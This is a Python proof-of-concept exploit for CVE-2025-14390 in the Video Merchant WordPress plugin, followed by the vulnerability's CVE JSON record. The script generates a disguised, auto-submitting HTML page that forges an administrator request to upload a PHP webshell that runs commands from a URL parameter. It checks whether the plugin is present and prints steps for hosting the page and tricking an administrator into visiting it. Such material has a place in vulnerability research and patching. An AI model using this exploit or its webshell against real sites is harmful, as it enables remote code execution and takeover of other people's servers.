CVE-2025-14390

import requests import sys # CVE-2025-14390 PoC - CSRF to RCE in Video Merchant WordPress Plugin # This PoC demonstrates how an attacker can exploit the CSRF vulnerability # to upload arbitrary files and achieve RCE TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress-site.com' ADMIN_URL = f'{TARGET_URL}/wp-admin/admin.php?page=video-merchant' def create_csrf_payload(): """ Generate HTML page with CSRF exploit that auto-submits malicious file upload """ html_template = ''' <!DOCTYPE html> <html> <head><title>Video Upload</title></head> <body> <h1>Loading video...</h1> <form id="exploit" action="{target}/wp-admin/admin.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="page" value="video-merchant"> <input type="hidden" name="video_merchant_action" value="add_video_file"> <input type="hidden" name="video_file" type="file"> <!-- Malicious PHP webshell payload --> <textarea name="video_file"><?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?></textarea> </form> <script>document.getElementById('exploit').submit();</script> </body> </html> '''.format(target=TARGET_URL) return html_template def check_vulnerability(): """Check if target is vulnerable by verifying plugin version""" plugin_info_url = f'{TARGET_URL}/wp-content/plugins/video-merchant/readme.txt' try: response = requests.get(plugin_info_url, timeout=10) if response.status_code == 200 and 'Video Merchant' in response.text: return True except: pass return False if __name__ == '__main__': print(f'[*] CVE-2025-14390 PoC for {TARGET_URL}') print(f'[*] Target appears vulnerable: {check_vulnerability()}') print('[+] Generate malicious HTML page and host it') print('[+] Trick admin into visiting the page') print('[+] Webshell will be uploaded to /wp-content/uploads/video-merchant/')

{"cve": {"id": "CVE-2025-14390", "sourceIdentifier": "[email protected]", "published": "2025-12-10T10:16:01.823", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Video Merchant plugin for WordPress is vulnerable to Cross-Site Request Forgery in version <= 5.0.4. This is due to missing or incorrect nonce validation on the video_merchant_add_video_file() function. This makes it possible for unauthenticated attackers to upload arbitrary files that make remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://wordpress.org/plugins/video-merchant", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7cbe39ae-d10b-432f-afab-682948de2521?source=cve", "source": "[email protected]"}]}}